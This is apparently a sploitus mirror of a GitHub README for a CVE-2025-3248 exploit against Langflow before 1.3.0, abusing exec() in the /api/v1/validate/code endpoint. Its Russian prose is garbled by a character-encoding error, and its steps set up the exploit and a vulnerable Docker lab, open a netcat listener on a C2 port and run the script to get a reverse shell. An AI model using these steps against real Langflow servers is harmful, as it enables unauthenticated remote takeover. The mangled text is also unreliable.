## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WAND3RLUST-CVE-2025-3248
# CVE-2025-3248
## ΠΠ²Π΅Π΄Π΅Π½ΠΈΠ΅
ΠΠ΅ΡΡΠΈΠΈ Langflow Π΄ΠΎ 1.3.0 ΠΏΠΎΠ΄Π²Π΅ΡΠΆΠ΅Π½Ρ Π½Π΅Π°ΡΡΠ΅Π½ΡΠΈΡΠΈΡΠΈΡΠΎΠ²Π°Π½Π½ΠΎΠΉ ΠΈΠ½ΡΠ΅ΠΊΡΠΈΠΈ ΠΊΠΎΠ΄Π° Π² ΠΊΠΎΠ½Π΅ΡΠ½ΠΎΠΉ ΡΠΎΡΠΊΠ΅ /api/v1/validate/code ΡΠ΅ΡΠ΅Π· ΡΡΠ½ΠΊΡΠΈΡ Python exec(). ΠΠ°Π½Π½ΡΠΉ ΡΠΊΡΠΏΠ»ΠΎΠΉΡ ΡΡΡΠ°Π½Π°Π²Π»ΠΈΠ²Π°Π΅Ρ ΠΎΠ±ΡΠ°ΡΠ½ΠΎΠ΅ ΠΏΠΎΠ΄ΠΊΠ»ΡΡΠ΅Π½ΠΈΠ΅ (reverse shell), ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡ ΡΡΡ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡ.
## ΠΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅
### ΠΠΎΠ½ΡΠΈΠ³ΡΡΠ°ΡΠΈΡ
root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
### Π£ΡΠ·Π²ΠΈΠΌΠΎΠ΅ ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅
root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
### ΠΠ°ΠΏΡΡΠΊ
root@kitploit:~
# Π’Π΅ΡΠΌΠΈΠ½Π°Π» 1
nc -nvlp <C2_PORT>
# Π’Π΅ΡΠΌΠΈΠ½Π°Π» 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>